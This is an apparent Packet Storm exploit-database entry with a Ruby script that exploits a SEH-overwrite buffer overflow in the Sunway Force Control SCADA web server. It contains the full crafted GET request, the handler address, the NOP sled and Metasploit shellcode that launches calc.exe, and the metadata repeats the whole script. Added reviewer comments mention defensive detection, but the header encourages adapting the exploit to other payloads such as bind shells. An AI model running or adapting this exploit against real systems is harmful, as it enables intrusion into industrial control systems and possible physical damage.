ID PACKETSTORM:104500 Type packetstorm Reporter Canberk BOLAT Modified 2011-08-26T00:00:00
Description
`# Sunway Force Control SCADA httpsvr.exe Exploit
# Exploitable with simple SEH Overwrite technique
# Tested on XP SP0 English
# Probably will work on XP SP3 if you find none-safeseh dll for p/p/r pointer
# Canberk BOLAT | @cnbrkbolat
# cbolat.blogspot.com
# for fun ;)
#
# notez: other payloads not working stable because of memory region's status.
# i tested meterpreter/bind_tcp and others some of them not work because of
# trying to write to unwritable memory regions.
# if you write some asm for changing access protection of memory region
# it can be work. try it, do it!
#
# Vendor: http://www.sunwayland.com.cn/
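# Delivers one raw request to @ip:@port and reads (and discards) up to 1 KiB of
# the reply. Returns true when the write and read completed, false on any
# connection/IO error.
#
# Reviewer notes:
#  - A top-level `def send` shadows Object#send for every object in the
#    process. A less collision-prone name would be safer, but the caller below
#    uses `send(pack)`, so the public name is kept.
#  - Relies on TCPSocket; assumes `require 'socket'` is already in effect
#    (not visible in this listing).
#  - The original leaked the socket when write/recv raised after the connect
#    succeeded, and a failure inside `recv` escaped the rescue entirely
#    (Ruby does not rescue exceptions raised in a `begin`'s `else` clause).
#    Both are handled here with a single `ensure`.
#  - `rescue Exception` also swallowed Interrupt/SystemExit; narrowed to
#    StandardError, which still covers Errno::* and SocketError.
#
# @param packet [String] bytes written verbatim to the socket
# @return [Boolean] true on success, false otherwise
def send(packet)
  sock = nil
  begin
    sock = TCPSocket.new(@ip, @port)
    sock.write(packet)
    sock.recv(1024) # reply content is not used; only completion matters
    return true
  rescue StandardError
    return false
  ensure
    sock.close if sock && !sock.closed?
  end
end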
# Target selection. ARGV[0] is used as-is (nil when no argument is given);
# nothing validates it. Port 80 is the product's HTTP listener (httpsvr.exe,
# per the header comment).
@ip = ARGV[0]
@port = 80
# windows/exec CMD=calc.exe
# Metasploit payload name for the bytes below: it launches calc.exe as a
# visible proof-of-execution marker and does nothing else. The header comment
# reports that other payloads were unstable because the landing region is not
# writable; this script does not attempt to work around that.
shellcode = "\xb8\xd5\x45\x06\xc4\xda\xde\xd9\x74\x24\xf4\x5b\x33\xc9" +
"\xb1\x33\x31\x43\x12\x03\x43\x12\x83\x3e\xb9\xe4\x31\x3c" +
"\xaa\x60\xb9\xbc\x2b\x13\x33\x59\x1a\x01\x27\x2a\x0f\x95" +
"\x23\x7e\xbc\x5e\x61\x6a\x37\x12\xae\x9d\xf0\x99\x88\x90" +
"\x01\x2c\x15\x7e\xc1\x2e\xe9\x7c\x16\x91\xd0\x4f\x6b\xd0" +
"\x15\xad\x84\x80\xce\xba\x37\x35\x7a\xfe\x8b\x34\xac\x75" +
"\xb3\x4e\xc9\x49\x40\xe5\xd0\x99\xf9\x72\x9a\x01\x71\xdc" +
"\x3b\x30\x56\x3e\x07\x7b\xd3\xf5\xf3\x7a\x35\xc4\xfc\x4d" +
"\x79\x8b\xc2\x62\x74\xd5\x03\x44\x67\xa0\x7f\xb7\x1a\xb3" +
"\xbb\xca\xc0\x36\x5e\x6c\x82\xe1\xba\x8d\x47\x77\x48\x81" +
"\x2c\xf3\x16\x85\xb3\xd0\x2c\xb1\x38\xd7\xe2\x30\x7a\xfc" +
"\x26\x19\xd8\x9d\x7f\xc7\x8f\xa2\x60\xaf\x70\x07\xea\x5d" +
"\x64\x31\xb1\x0b\x7b\xb3\xcf\x72\x7b\xcb\xcf\xd4\x14\xfa" +
"\x44\xbb\x63\x03\x8f\xf8\x9c\x49\x92\xa8\x34\x14\x46\xe9" +
"\x58\xa7\xbc\x2d\x65\x24\x35\xcd\x92\x34\x3c\xc8\xdf\xf2" +
"\xac\xa0\x70\x97\xd2\x17\x70\xb2\xb0\xf6\xe2\x5e\x19\x9d" +
"\x82\xc5\x65"
# Request-path layout. Total length is fixed at
# 1599 + 4 + 4 + 40 + 4058 = 5705 bytes regardless of shellcode size.
# Defensive note: the entire trigger is one GET whose path is ~5.7 KB of raw,
# non-URL-encoded bytes; a request-line length limit in front of the service,
# or an IDS rule on oversized URIs, would flag it.
payload = "H" * 1599
payload << "\xeb\x06\x90\x90" # Pointer to Next SE Handler
payload << [0x719737FA].pack("V*") # SEH Handler - p/p/r
# The address above is packed little-endian ("V") and, per the header comment,
# is specific to the XP SP0 build it was tested on; SafeSEH-enforced modules,
# DEP and ASLR are exactly the mitigations that break this step.
payload << "\x90" * 40
payload << shellcode
# Pad to the fixed total. A shellcode longer than 4058 bytes makes the
# multiplier negative and String#* raises ArgumentError.
payload << "\x90" * (4058 - shellcode.length)
pack = "GET /#{payload} HTTP/1.1\r\n"
# Host value carries a scheme ("http://"), which is not a valid Host header;
# presumably the server does not parse it — another oddity worth matching on.
pack << "Host: http://#{@ip}:#{@port}\r\n\r\n"
# send() returns true only when the write and a read of the reply completed;
# it says nothing about whether the overflow actually occurred.
puts "packet sended." if send(pack)
`
{"edition": 1, "title": "Sunway Force Control SCADA 6.1 SP3 SEH Overwrite", "bulletinFamily": "exploit", "published": "2011-08-26T00:00:00", "lastseen": "2016-11-03T10:28:37", "history": [], "modified": "2011-08-26T00:00:00", "reporter": "Canberk BOLAT", "hash": "1cecdcea81da0ea655e57890bfb39176c2d97769a257dfc9b0d3681a9c1251ad", "sourceHref": "https://packetstormsecurity.com/files/download/104500/sunway-overwrite.txt", "viewCount": 0, "href": "https://packetstormsecurity.com/files/104500/Sunway-Force-Control-SCADA-6.1-SP3-SEH-Overwrite.html", "description": "", "type": "packetstorm", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "7c33874d4fb5142262808ce362dbffad"}, {"key": "modified", "hash": "76bd11f263fa3a5672168342040bb329"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "76bd11f263fa3a5672168342040bb329"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "f248dbe1d5e06a132752819b1559efca"}, {"key": "sourceData", "hash": "2cdff93183418f320e5eb96118bc92ca"}, {"key": "sourceHref", "hash": "397b0dae3176673351f54e98de9b113e"}, {"key": "title", "hash": "2327f4bb772ff37d70688b0fb95867d9"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "references": [], "objectVersion": "1.2", "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2016-11-03T10:28:37"}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:37"}, "vulnersScore": 0.6}, "sourceData": "`# Sunway Force Control SCADA httpsvr.exe Exploit \n# Exploitable with simple SEH Overwrite technique \n# Tested on XP SP0 English \n# Probably will work on XP SP3 if you find none-safeseh dll for p/p/r pointer \n# Canberk BOLAT | 
@cnbrkbolat \n# cbolat.blogspot.com \n# for fun ;) \n# \n# notez: other payloads not working stable because of memory region's status. \n# i tested meterpreter/bind_tcp and others some of them not work because of \n# trying to write to unwritable memory regions. \n# if you write some asm for changing access protection of memory region \n# it can be work. try it, do it! \n# \n# Vendor: http://www.sunwayland.com.cn/ \n \ndef send(packet) \nbegin \nsock = TCPSocket.new(@ip, @port) \nsock.write(packet) \nrescue Exception => e \nreturn false \nelse \nresp = sock.recv(1024) \nsock.close \n \nreturn true \nend \nend \n \n@ip = ARGV[0] \n@port = 80 \n \n# windows/exec CMD=calc.exe \nshellcode = \"\\xb8\\xd5\\x45\\x06\\xc4\\xda\\xde\\xd9\\x74\\x24\\xf4\\x5b\\x33\\xc9\" + \n\"\\xb1\\x33\\x31\\x43\\x12\\x03\\x43\\x12\\x83\\x3e\\xb9\\xe4\\x31\\x3c\" + \n\"\\xaa\\x60\\xb9\\xbc\\x2b\\x13\\x33\\x59\\x1a\\x01\\x27\\x2a\\x0f\\x95\" + \n\"\\x23\\x7e\\xbc\\x5e\\x61\\x6a\\x37\\x12\\xae\\x9d\\xf0\\x99\\x88\\x90\" + \n\"\\x01\\x2c\\x15\\x7e\\xc1\\x2e\\xe9\\x7c\\x16\\x91\\xd0\\x4f\\x6b\\xd0\" + \n\"\\x15\\xad\\x84\\x80\\xce\\xba\\x37\\x35\\x7a\\xfe\\x8b\\x34\\xac\\x75\" + \n\"\\xb3\\x4e\\xc9\\x49\\x40\\xe5\\xd0\\x99\\xf9\\x72\\x9a\\x01\\x71\\xdc\" + \n\"\\x3b\\x30\\x56\\x3e\\x07\\x7b\\xd3\\xf5\\xf3\\x7a\\x35\\xc4\\xfc\\x4d\" + \n\"\\x79\\x8b\\xc2\\x62\\x74\\xd5\\x03\\x44\\x67\\xa0\\x7f\\xb7\\x1a\\xb3\" + \n\"\\xbb\\xca\\xc0\\x36\\x5e\\x6c\\x82\\xe1\\xba\\x8d\\x47\\x77\\x48\\x81\" + \n\"\\x2c\\xf3\\x16\\x85\\xb3\\xd0\\x2c\\xb1\\x38\\xd7\\xe2\\x30\\x7a\\xfc\" + \n\"\\x26\\x19\\xd8\\x9d\\x7f\\xc7\\x8f\\xa2\\x60\\xaf\\x70\\x07\\xea\\x5d\" + \n\"\\x64\\x31\\xb1\\x0b\\x7b\\xb3\\xcf\\x72\\x7b\\xcb\\xcf\\xd4\\x14\\xfa\" + \n\"\\x44\\xbb\\x63\\x03\\x8f\\xf8\\x9c\\x49\\x92\\xa8\\x34\\x14\\x46\\xe9\" + \n\"\\x58\\xa7\\xbc\\x2d\\x65\\x24\\x35\\xcd\\x92\\x34\\x3c\\xc8\\xdf\\xf2\" + \n\"\\xac\\xa0\\x70\\x97\\xd2\\x17\\x70\\xb2\\xb0\\xf6\\xe2\\x5e\\x19\\x9d\" + \n\"\\x82\\xc5\\x65\" \n \npayload = 
\"H\" * 1599 \npayload << \"\\xeb\\x06\\x90\\x90\" # Pointer to Next SE Handler \npayload << [0x719737FA].pack(\"V*\") # SEH Handler - p/p/r \npayload << \"\\x90\" * 40 \npayload << shellcode \npayload << \"\\x90\" * (4058 - shellcode.length) \n \npack = \"GET /#{payload} HTTP/1.1\\r\\n\" \npack << \"Host: http://#{@ip}:#{@port}\\r\\n\\r\\n\" \n \nputs \"packet sended.\" if send(pack) \n \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "cvelist": [], "id": "PACKETSTORM:104500"}